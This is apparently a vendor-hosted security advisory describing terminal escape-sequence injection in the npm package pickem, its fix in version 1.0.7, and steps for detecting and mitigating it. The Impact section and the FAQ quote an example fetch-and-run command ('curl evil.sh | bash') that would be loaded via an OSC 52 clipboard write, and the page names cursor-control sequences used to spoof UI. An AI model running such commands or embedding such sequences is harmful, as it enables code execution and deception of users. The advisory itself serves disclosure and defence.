Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm
Not in CISA KEV

pickem vulnerable to terminal escape-sequence injection via unsanitized item textGHSA-8qx3-8gm5-9cj2

GHSA-8qx3-8gm5-9cj2 is a remote code execution vulnerability in pickem. A fix is available for pickem — see the affected versions and patch details below.

Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Aug 26, 2026 · OSV.dev, FIRST.org (EPSS)

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

0other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
pickemnpm
12downloads / week

Description

Impact

pickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. chrome.row only stripped ANSI from the active row; inactive rows, the public createFormatter, and selection-summary lines printed labels raw, and the ANSI strip missed bare C0 controls anyway.

Because item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive:

  • OSC 52 clipboard write — silently load e.g. curl evil.sh | bash into the user's clipboard; their next paste-into-shell is RCE.
  • Cursor-movement + erase (ESC[1A, ESC[2K) — overwrite already-printed trusted lines to spoof UI (forge a "✓ Verified publisher", fake prompt, or hide a malicious entry).
  • BEL / C0 control flooding.

Any CLI that passes untrusted strings into pickem choices is affected.

Patches

Fixed in 1.0.7. A new sanitizeDisplay() strips every escape sequence except inert SGR (color), plus all C0/C1/DEL control bytes, at the render boundary — applied to every externally-supplied display string across all prompts (select, search, checkbox, searchable-checkbox, input), createFormatter, row meta, and committed selection summaries. Display-only; returned values are unchanged.

Workarounds

Upgrade to >= 1.0.7. Otherwise, strip C0/C1/DEL control characters and ANSI escape sequences from any untrusted text before passing it to pickem.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmpickemall versions1.0.7npm install pickem@1.0.7

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for pickem, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update pickem to 1.0.7 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-8qx3-8gm5-9cj2 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

Frequently Asked Questions

### Impact pickem rendered item text (label, description, group, meta, name) to the terminal with no control-character sanitization. `chrome.row` only stripped ANSI from the **active** row; inactive rows, the public `createFormatter`, and selection-summary lines printed labels **raw**, and the ANSI strip missed bare C0 controls anyway. Because item text is frequently attacker-controllable (git branch names, PR/issue titles, filenames, npm/API results), a malicious label was a terminal write primitive: - **OSC 52 clipboard write** — silently load e.g. `curl evil.sh | bash` into the user's cli
O3 Security · Impact-Aware SCA

Is GHSA-8qx3-8gm5-9cj2 in your dependencies?

Find it across npm, including transitive dependencies.

GHSA-8qx3-8gm5-9cj2: pickem RCE — Fixed in 1.0.7